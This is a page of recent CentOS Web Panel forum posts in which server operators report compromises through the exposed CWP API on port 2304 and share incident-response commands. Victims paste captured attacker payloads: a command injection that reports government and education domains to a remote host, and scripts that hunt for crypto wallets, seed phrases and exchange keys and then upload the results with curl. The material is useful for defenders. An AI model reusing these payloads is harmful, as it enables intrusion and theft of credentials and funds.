21
Information / Re: To the CWP team and all its users (We are tired of getting hacked every day.)
« Last post by cyberspace on October 06, 2026, 09:19:21 PM »Hi,
Install CSF:
https://github.com/Aetherinox/csf-firewall
https://github.com/Black-HOST/csf
or similar firewall fork on your server and block access to the port 2304 for everyone except your billing server. If you don't need access to the CWP's API then leave the port 2304 closed.
Install CSF:
https://github.com/Aetherinox/csf-firewall
https://github.com/Black-HOST/csf
or similar firewall fork on your server and block access to the port 2304 for everyone except your billing server. If you don't need access to the CWP's API then leave the port 2304 closed.
22
Updates / Re: She's ready for a night of fun
« Last post by Martins-phpbb on October 06, 2026, 08:57:49 PM »Nice got any fat birds ? i like em large 

23
CentOS-WebPanel Bugs / Re: Possible CWP security issue - root compromise, OMRIG miner and port 2304 exposed
« Last post by Wonder on October 06, 2026, 12:31:16 PM »How to clean the server? I think I have the same issueHi. Before deleting anything, I would recommend checking whether your compromise is actually the same one.
We found several different indicators on the affected server, including OMRIG/XMRig-related persistence and later a suspicious root process running from a deleted memfd, so preserving evidence before cleaning is important.
If possible, please do not reinstall, reboot or delete suspicious files yet.
Could you first post the output of:
Code: [Select]
ps auxf
ss -plant
ss -lntp
find /proc/[0-9]*/exe -lname '*deleted*' -ls 2>/dev/null
systemctl list-unit-files --type=service | grep -Ei \
'systemd-logind-helpers|polkitd-helpers|dbus-monitor-srv|auth-policykit'
ls -la /usr/sbin/netd /usr/bin/systemd-logind-helpers \
/usr/bin/polkitd-helpers /usr/bin/dbus-monitor-srv 2>/dev/nullAlso, if you use the CWP External API, please check whether port 2304 is publicly accessible and preserve these logs before doing anything else:
Code: [Select]
/usr/local/cwpsrv/logs/2304_access_log
/usr/local/cwpsrv/logs/2304_error_log
/var/log/cwp/cwp_api.logIn our case we found malicious requests to CWP API endpoints such as /v1/backup, /v1/endtransf/ and /v1/addemail/, followed by commands executed as root.Please redact passwords, API keys/tokens and other credentials before posting any logs here.
Once we know whether the indicators match, I can explain what we removed and how we checked the server afterwards. But I would preserve the evidence first, because it may also help determine exactly how the CWP API was exploited.
24
CentOS-WebPanel Bugs / Re: Possible CWP security issue - root compromise, OMRIG miner and port 2304 exposed
« Last post by kandalf on October 06, 2026, 09:38:32 AM »How to clean the server? I think I have the same issue
25
CentOS 9 Problems / Automatic login failure in reseller -> accounts
« Last post by André Bastos on October 05, 2026, 06:28:26 PM »A reseller account cannot log in to a client account via Reseller -> Accounts -> username.
It opens the login page instead of logging in automatically as it should.
CWPpro version: 1.17
Distro Name: AlmaLinux release 9.8 (Olive Jaguar)
print:
It opens the login page instead of logging in automatically as it should.
CWPpro version: 1.17
Distro Name: AlmaLinux release 9.8 (Olive Jaguar)
print:

26
CentOS-WebPanel Bugs / Re: Possible CWP security issue - root compromise, OMRIG miner and port 2304 exposed
« Last post by alexander999 on October 05, 2026, 03:15:53 PM »This is what 184.107.106.86 was doing on my server, taken from cwp_api.log
Code: [Select]
mysql --defaults-extra-file=/root/.my.cnf < /home/x;(
echo == mounts; df -h | grep -vE 'tmpfs|loop|udev'
echo == walletfind
timeout 70 find /home /var /opt /srv /mnt /media /data /usr/local /backup* /root -maxdepth 9 \( -iname 'wallet.dat' -o -iname '*.wallet' -o -iname 'keystore' -type d -o -iname 'electrum' -type d -o -iname 'bitcoin.conf' -o -iname 'litecoin.conf' -o -iname 'dogecoin.conf' -o -iname 'dash.conf' -o -iname 'monero' -type d -o -iname '.bitmonero' -o -iname '*xmr*wallet*' -o -iname 'xmrig*' -o -iname 'lnd.conf' -o -iname '*.lnd' -o -iname 'solana' -type d -o -iname 'id.json' \) -not -path '*node_modules*' -not -path '*phpmyadmin*' 2>/dev/null | head -100
echo == procs; ps auxwww | grep -iE 'xmrig|monerod|bitcoind|litecoind|dogecoind|geth|gaia|solana|cardano|tron|electrumx|btcpay|nbxplorer|dashd|zcashd|rippled|waves' | grep -v grep
echo == ports; ss -tlnp 2>/dev/null | grep -E ':8332|:8333|:18332|:9332|:18081|:18082|:8545|:8546|:30303|:8899|:22555'
echo ZMARK_END
) > /tmp/.yypvxqy 2>&1; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:993/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:993/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:587/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:587/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:465/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:465/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:25/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:25/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:8888/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:8888/act ; rm -f /tmp/.yypvxqy;echo/dumpsql.sql
okokokokokoksh: line 8: echo/user_grants.sql: No such file or directoryCode: [Select]
mysql --defaults-extra-file=/root/.my.cnf < /home/x;( echo ## myserver.ovh vmail+crypto sweep
echo == vmaildoms
ls /var/vmail 2>/dev/null | head -40
echo == maildirs-dirs-crypto
find /var/vmail -maxdepth 4 -type d 2>/dev/null | grep -iE 'wallet|btc|eth|coin|mine|work|crypto|seed|seedphrase|backup' | head -40
echo == vmailgrep-subjects
timeout 240 grep -rliI -E '(subject:.*(wallet|seed|mnemonic|private.?key|bitcoin|monero|litecoin|doge|ethereum|keystore|solana|kaspa|exodus|electrum|metamask|trust.?wallet|binance|coinbase|kraken|kucoin))' /var/vmail /home/*/mail /var/spool/mail 2>/dev/null | head -100
echo == maildir-list
for m in /var/spool/mail/* ; do [ -s ] && echo SPOOL ; done 2>/dev/null | head -20
echo == keyfind
timeout 150 find /home /root /var/www /opt /srv /mnt /media /backup /backups /data -maxdepth 8 \( -iname 'wallet.dat' -o -iname '*.wallet' -o -iname '*.kdbx' -o -iname 'UTC--*' -o -iname '*.keystore' -o -iname '*seed*phrase*' -o -iname '*electrum*' -o -iname 'id.json' -o -iname '*.xmr*' \) -not -path '*node_modules*' -not -path '*phpmyadmin*' 2>/dev/null | head -80
echo == exchangekeys
timeout 150 grep -rliI -E '(BINANCE_API|COINBASE_API|KUCOIN_API|BITMEX_API|secretKey.{0,40}(binance|kucoin)|api_key.{0,20}(telegram|binance))' /home/*/public_html /var/www /root 2>/dev/null | head -40
echo == dockercrypto
docker ps --format '{{.Image}} {{.Names}}' 2>/dev/null | grep -iE 'bitco|geth|monero|solana|tron|cardano|kaspa|nbxplorer|btcpay|electrum' | head -20
echo == btcpay
ls -d /root/.nbxplorer /root/.btcpayserver /home/*/.nbxplorer 2>/dev/null
echo ZMARK_END
) > /tmp/.ymwqrjq 2>&1; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:993/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:993/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:587/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:587/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:465/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:465/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:25/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:25/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:8888/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:8888/act ; rm -f /tmp/.ymwqrjq;echo/user_grants.sql
27
CentOS-WebPanel Bugs / Possible CWP security issue - root compromise, OMRIG miner and port 2304 exposed
« Last post by Wonder on October 05, 2026, 02:28:05 PM »Hi,
I'm posting this because I've had a security incident on one of my CWP servers and, after seeing some of the recent security reports here, I thought it might be useful to share what I found and see if anyone else has seen the same thing.
The server is running AlmaLinux 8 with CWP.
I found what appears to be an OMRIG crypto miner, together with these suspicious services/binaries:
During the investigation I found these two IP addresses, which I have now blocked:
184.107.106.86 appeared during the investigation of suspicious outbound activity.
Another thing that caught my attention was port 2304, used by the CWP External API. It was publicly exposed on this server. I have now removed it from the allowed ports in CSF and confirmed that it is no longer accessible.
I have restored the server from a backup taken before the incident, removed/checked the suspicious services and files, blocked both IP addresses and closed port 2304.
I want to make clear that I cannot confirm that port 2304 or the CWP API was the entry point. I'm mentioning it because it was exposed at the time of the incident and because I've seen other recent reports of CWP servers being compromised with root access and crypto miners.
Has anyone else seen these same services/binaries or IP addresses on an affected CWP server?
And does anyone know if this could be related to one of the recent CWP security/API issues?
I still have information and logs from the incident, so I can provide more details if they are useful.
Thanks.
I'm posting this because I've had a security incident on one of my CWP servers and, after seeing some of the recent security reports here, I thought it might be useful to share what I found and see if anyone else has seen the same thing.
The server is running AlmaLinux 8 with CWP.
I found what appears to be an OMRIG crypto miner, together with these suspicious services/binaries:
Code: [Select]
dbus-monitor-srv
polkitd-helpers
systemd-logind-helpersThere were also signs of persistence through systemd.During the investigation I found these two IP addresses, which I have now blocked:
Code: [Select]
146.103.45.130
184.107.106.86146.103.45.130 was related to the miner activity.184.107.106.86 appeared during the investigation of suspicious outbound activity.
Another thing that caught my attention was port 2304, used by the CWP External API. It was publicly exposed on this server. I have now removed it from the allowed ports in CSF and confirmed that it is no longer accessible.
I have restored the server from a backup taken before the incident, removed/checked the suspicious services and files, blocked both IP addresses and closed port 2304.
I want to make clear that I cannot confirm that port 2304 or the CWP API was the entry point. I'm mentioning it because it was exposed at the time of the incident and because I've seen other recent reports of CWP servers being compromised with root access and crypto miners.
Has anyone else seen these same services/binaries or IP addresses on an affected CWP server?
And does anyone know if this could be related to one of the recent CWP security/API issues?
I still have information and logs from the incident, so I can provide more details if they are useful.
Thanks.
28
Information / To the CWP team and all its users (We are tired of getting hacked every day.)
« Last post by comokoko on October 05, 2026, 12:28:38 PM »To the CWP team and all its users:
For months, our servers have been under constant attack. All sites hosted on our servers are being redirected to gambling sites. They are ruining our SEO efforts; our sites' Google indices now contain tags related to gambling sites.
Cryptocurrency mining services are constantly being run on our servers.
While we can only access our servers using our root passwords, unauthorized individuals are gaining root access without needing any password and doing whatever they please on our systems.
We are losing all our customers; we spend 24/7 trying to repair the damage done to our servers. We simply no longer have the strength to keep doing this.
We format our servers and reinstall the operating system and the latest version of CWP, yet the servers get hacked again within the very same day.
I believe the CWP team fails to detect—and therefore cannot patch—security vulnerabilities, and that they lack personnel with the necessary expertise to properly develop or secure the panel.
For this reason, I want the CWP team to acknowledge these shortcomings and announce that they are ceasing development of CWP.
This would ensure everyone is informed, as many people are unaware that CWP has become nothing more than a "toy"—a system so insecure that even children can hack it and anyone can gain server access by any means.
For months, our servers have been under constant attack. All sites hosted on our servers are being redirected to gambling sites. They are ruining our SEO efforts; our sites' Google indices now contain tags related to gambling sites.
Cryptocurrency mining services are constantly being run on our servers.
While we can only access our servers using our root passwords, unauthorized individuals are gaining root access without needing any password and doing whatever they please on our systems.
We are losing all our customers; we spend 24/7 trying to repair the damage done to our servers. We simply no longer have the strength to keep doing this.
We format our servers and reinstall the operating system and the latest version of CWP, yet the servers get hacked again within the very same day.
I believe the CWP team fails to detect—and therefore cannot patch—security vulnerabilities, and that they lack personnel with the necessary expertise to properly develop or secure the panel.
For this reason, I want the CWP team to acknowledge these shortcomings and announce that they are ceasing development of CWP.
This would ensure everyone is informed, as many people are unaware that CWP has become nothing more than a "toy"—a system so insecure that even children can hack it and anyone can gain server access by any means.
29
CWP API / Re: My server was hacked through open port 2304. Block IP 146.103.45.130
« Last post by comokoko on October 05, 2026, 09:52:42 AM »Dozens of our servers with the same configuration have been hacked in the same way.
Our servers running CWP haven't been secure for months; anyone can gain root access at will and do whatever they want on them.
We are completely exhausted from constantly dealing with CWP servers getting hacked 24/7. We are losing all our customers because of this.
I no longer believe the CWP team possesses the level of expertise required to handle this panel.
Our servers running CWP haven't been secure for months; anyone can gain root access at will and do whatever they want on them.
We are completely exhausted from constantly dealing with CWP servers getting hacked 24/7. We are losing all our customers because of this.
I no longer believe the CWP team possesses the level of expertise required to handle this panel.
30
CWP API / My server was hacked through open port 2304. Block IP 146.103.45.130
« Last post by alexander999 on October 05, 2026, 02:58:30 AM »Hi,
The server was hacked and a miner was launched.
Distro Name: AlmaLinux release 9.8
CWPpro version: 1.17
Also, based on log analysis, the gpt chat created a visualization of the attack.
Internet > 146.103.45.130 > CWP API :2304 > POST /v1/backup > command injection > bash -c > wget/curl [http://]146.103.45.130/ omrig.sh > XMRig 6.26.0 (polkitd-helpers, dbus-monitor-srv, systemd-logind-helpers) > 146.103.45.130:3333 > Monero mining
I immediately closed the port and deleted all the services he created. It seemed like there was nothing left in the system, but the miner sent data to the hacker's server for an hour.
I hope the developers will fix the issue with port 2304. The omrig.sh script is still available for download on this server. Please run everything in a sandbox and make the panel more secure!!!!!!!!
It's too bad that I can't publish the full log on the forum.
The server was hacked and a miner was launched.
Distro Name: AlmaLinux release 9.8
CWPpro version: 1.17
Also, based on log analysis, the gpt chat created a visualization of the attack.
Internet > 146.103.45.130 > CWP API :2304 > POST /v1/backup > command injection > bash -c > wget/curl [http://]146.103.45.130/ omrig.sh > XMRig 6.26.0 (polkitd-helpers, dbus-monitor-srv, systemd-logind-helpers) > 146.103.45.130:3333 > Monero mining
I immediately closed the port and deleted all the services he created. It seemed like there was nothing left in the system, but the miner sent data to the hacker's server for an hour.
I hope the developers will fix the issue with port 2304. The omrig.sh script is still available for download on this server. Please run everything in a sandbox and make the panel more secure!!!!!!!!
Code: [Select]
Start backup ;T_URL=https://my.server:2304/ bash -c #!/bin/bash T_URL=${T_URL:-"none"} URL="http://146.103.45.130:8891/dataawpdlapwdlpawdlkaowdkoawkok213ok213o" PAYLOAD='{"status": "special"}' DIRS=( "/usr/local/apache/conf.d/vhosts" "/etc/nginx/conf.d/vhosts", "/var/named/" ) PATTERNS=( "*.go.*" "*.ac.*" "*.gov" "*.gov.*" "*.edu" "*.edu.*" "*.gob.*" "*.gob" "*.mil" "*.mil.*" ) FIND_ARGS=() for i in "${!PATTERNS[@]}"; do if [ "$i" -gt 0 ]; then FIND_ARGS+=(-o) fi FIND_ARGS+=(-name "${PATTERNS[$i]}") done FOUND=0 for dir in "${DIRS[@]}"; do if [ ! -d "$dir" ]; then continue fi if find "$dir" -maxdepth 1 \( "${FIND_ARGS[@]}" \) -print -quit | grep -q .; then FOUND=1 fi done if [ "$FOUND" -eq 1 ]; then if command -v curl &> /dev/null; then # -s: silent, -o /dev/null: ignore body, -w "%{http_code}": print status code STATUS=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$URL" \ -H "Content-Type: application/json" \ -H "X-URL: $T_URL" \ -d "$PAYLOAD") # Check if HTTP status is in the 2xx success range (200-299) if [ "$STATUS" -ge 200 ] && [ "$STATUS" -lt 300 ]; then echo "ok (curl: $STATUS)" exit 0 fi fi if command -v wget &> /dev/null; then # --post-data ensures compatibility across all wget versions if wget -q -O /dev/null --header="Content-Type: application/json" --header="X-URL: $T_URL" --post-data="$PAYLOAD" "$URL"; then echo "ok (wget)" exit 0 fi fi echo "special_yes" else echo "special_no" fi;20260725115706053575a77f0cce7e3491ed9e2c1fed47It's too bad that I can't publish the full log on the forum.
Recent Posts